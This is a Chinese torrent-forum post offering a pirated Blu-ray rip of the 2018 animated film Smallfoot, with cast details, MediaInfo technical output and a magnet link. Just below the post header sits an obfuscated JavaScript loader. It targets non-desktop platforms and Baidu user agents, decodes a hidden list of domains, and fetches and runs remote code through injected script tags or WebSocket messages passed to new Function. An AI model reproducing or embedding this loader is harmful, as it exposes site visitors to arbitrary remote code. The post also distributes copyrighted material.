雪怪大冒险[双语字幕]Smallfoot.2018.1080p.BluRay.x264.DTS-迅雷下载 8.79GB

版主小s 17天前 157

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 雪怪大冒险 / 大脚怪奇遇记 / 寻找小脚八(港) / 小脚 / 小脚丫与大脚怪 / 小脚怪(台) / 雪人寻人记
◎片  名 Smallfoot
◎年  代 2018
◎产  地 美国
◎类  别 喜剧 / 动画 / 歌舞 / 冒险
◎语  言 英语
◎上映日期 2018-09-28(美国) / 2018-10-19(中国大陆)
◎IMDb评分  6.6/10 from 30834 users
◎IMDb链接  https://www.imdb.com/title/tt6182908
◎豆瓣评分 7.4/10 from 22909 users
◎豆瓣链接 https://movie.douban.com/subject/26944582/
◎片  长 96分钟
◎导  演 凯瑞·柯克帕特里克 Karey Kirkpatrick / Jason Reisig
◎编  剧 凯瑞·柯克帕特里克 Karey Kirkpatrick / 塞尔希奥·巴勃罗斯 Sergio Pablos
◎主  演 查宁·塔图姆 Channing Tatum
       詹姆斯·柯登 James Corden
       赞达亚 Zendaya
       勒布朗·詹姆斯 LeBron James
       科曼 Common
       吉娜·罗德里格兹 Gina Rodriguez
       丹尼·德维托 Danny DeVito
       吉米·塔特罗 Jimmy Tatro
       雅拉·沙希迪 Yara Shahidi
       伊利·亨利 Ely Henry


◎标  签 动画 | 美国 | 喜剧 | 冒险 | 奇幻 | 2018 | 儿童 | 音乐

◎简  介  

  《雪怪大冒险》是一部囊括巨星阵容及美妙原创音乐的全年龄段冒险动画片。当一只年轻活泼的雪人发现了之前本认为不存在的人类,大脚怪传奇自此乱了套。
  影片讲述了一个关乎友情、勇气与探索之趣的动人故事。关于人类这个“小脚怪”的消息让原本单纯的雪人族群陷入了骚乱之中,他们开始好奇,在雪村之外,究竟存在着一个怎样的世界?

◎获奖情况  

  第46届动画安妮奖(2019)
  最佳配乐(提名)

  第66届美国音效剪辑协会奖(2019)
  金卷轴奖 最佳动画片音效剪辑(提名)

  第17届美国视觉效果协会奖(2019)
  最佳动画电影模拟动画效果(提名)

  第5届豆瓣电影年度榜单(2018)
  评分最高的动画片(提名)

  1. General
  2. Unique ID                                : 304561607697613843805508968876799746230 (0xE5206E98B3D720C5D771532E92B4E0B6)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 8.79 GiB
  7. Duration                                 : 1 h 36 min
  8. Overall bit rate                         : 13.1 Mb/s
  9. Movie name                               : Smallfoot 2018
  10. Encoded date                             : UTC 2021-07-08 12:44:36
  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Cover                                    : Yes
  14. Attachments                              : cover.jpg
  15. Video
  16. ID                                       : 1
  17. Format                                   : AVC
  18. Format/Info                              : Advanced Video Codec
  19. Format profile                           : [email protected]
  20. Format settings                          : CABAC / 4 Ref Frames
  21. Format settings, CABAC                   : Yes
  22. Format settings, Reference frames        : 4 frames
  23. Codec ID                                 : V_MPEG4/ISO/AVC
  24. Duration                                 : 1 h 36 min
  25. Bit rate                                 : 11.5 Mb/s
  26. Width                                    : 1 920 pixels
  27. Height                                   : 800 pixels
  28. Display aspect ratio                     : 2.40:1
  29. Frame rate mode                          : Constant
  30. Frame rate                               : 23.976 (24000/1001/53354) FPS
  31. Color space                              : YUV
  32. Chroma subsampling                       : 4:2:0
  33. Bit depth                                : 8 bits
  34. Scan type                                : Progressive
  35. Bits/(Pixel*Frame)                       : 0.311
  36. Stream size                              : 7.71 GiB (88%)
  37. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  38. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=0.50:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.20 / pb_ratio=1.10 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  39. Language                                 : English
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Audio
  43. ID                                       : 2
  44. ID in the original source medium         : 4352 (0x1100)
  45. Format                                   : DTS
  46. Format/Info                              : Digital Theater Systems
  47. Codec ID                                 : A_DTS
  48. Duration                                 : 1 h 36 min
  49. Bit rate mode                            : Constant
  50. Bit rate                                 : 1 509 kb/s
  51. Channel(s)                               : 6 channels
  52. Channel layout                           : C L R Ls Rs LFE
  53. Sampling rate                            : 48.0 kHz
  54. Frame rate                               : 93.750 FPS (512 SPF)
  55. Bit depth                                : 24 bits
  56. Compression mode                         : Lossy
  57. Stream size                              : 1.01 GiB (12%)
  58. Language                                 : English
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Original source medium                   : Blu-ray
  62. Text #1
  63. ID                                       : 3
  64. ID in the original source medium         : 4613 (0x1205)
  65. Format                                   : PGS
  66. Muxing mode                              : zlib
  67. Codec ID                                 : S_HDMV/PGS
  68. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  69. Duration                                 : 1 h 30 min
  70. Bit rate                                 : 60.2 kb/s
  71. Count of elements                        : 2926
  72. Stream size                              : 39.1 MiB (0%)
  73. Title                                    : chs&eng
  74. Language                                 : Chinese
  75. Default                                  : Yes
  76. Forced                                   : No
  77. Original source medium                   : Blu-ray
  78. Text #2
  79. ID                                       : 4
  80. ID in the original source medium         : 4614 (0x1206)
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 1 h 30 min
  86. Bit rate                                 : 60.6 kb/s
  87. Count of elements                        : 2926
  88. Stream size                              : 39.4 MiB (0%)
  89. Title                                    : cht&eng
  90. Language                                 : Chinese
  91. Default                                  : No
  92. Forced                                   : No
  93. Original source medium                   : Blu-ray
  94. Text #3
  95. ID                                       : 5
  96. ID in the original source medium         : 4615 (0x1207)
  97. Format                                   : PGS
  98. Muxing mode                              : zlib
  99. Codec ID                                 : S_HDMV/PGS
  100. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  101. Duration                                 : 1 h 30 min
  102. Bit rate                                 : 33.1 kb/s
  103. Count of elements                        : 2926
  104. Stream size                              : 21.5 MiB (0%)
  105. Title                                    : chs
  106. Language                                 : Chinese
  107. Default                                  : No
  108. Forced                                   : No
  109. Original source medium                   : Blu-ray
  110. Text #4
  111. ID                                       : 6
  112. ID in the original source medium         : 4616 (0x1208)
  113. Format                                   : PGS
  114. Muxing mode                              : zlib
  115. Codec ID                                 : S_HDMV/PGS
  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  117. Duration                                 : 1 h 30 min
  118. Bit rate                                 : 33.5 kb/s
  119. Count of elements                        : 2926
  120. Stream size                              : 21.7 MiB (0%)
  121. Title                                    : cht
  122. Language                                 : Chinese
  123. Default                                  : No
  124. Forced                                   : No
  125. Original source medium                   : Blu-ray
  126. Text #5
  127. ID                                       : 7
  128. ID in the original source medium         : 4608 (0x1200)
  129. Format                                   : PGS
  130. Muxing mode                              : zlib
  131. Codec ID                                 : S_HDMV/PGS
  132. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  133. Duration                                 : 1 h 35 min
  134. Bit rate                                 : 53.4 kb/s
  135. Count of elements                        : 3864
  136. Stream size                              : 36.6 MiB (0%)
  137. Language                                 : English
  138. Default                                  : No
  139. Forced                                   : No
  140. Original source medium                   : Blu-ray
  141. Menu
  142. 00:00:00.000                             : Chapter 01
  143. 00:09:56.262                             : Chapter 02
  144. 00:21:36.295                             : Chapter 03
  145. 00:32:10.637                             : Chapter 04
  146. 00:38:33.602                             : Chapter 05
  147. 00:49:59.705                             : Chapter 06
  148. 00:55:37.167                             : Chapter 07
  149. 01:01:53.209                             : Chapter 08
  150. 01:12:04.278                             : Chapter 09
  151. 01:18:26.076                             : Chapter 10
  152. 01:26:16.796                             : Chapter 11
  153. 01:31:12.300                             : Chapter 12


TAGS 冒险 动画 喜剧 歌舞

磁力链:
  • magnet:?xt=urn:btih:58B8202FE936A9828961AD4A1250908CE3884C84
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回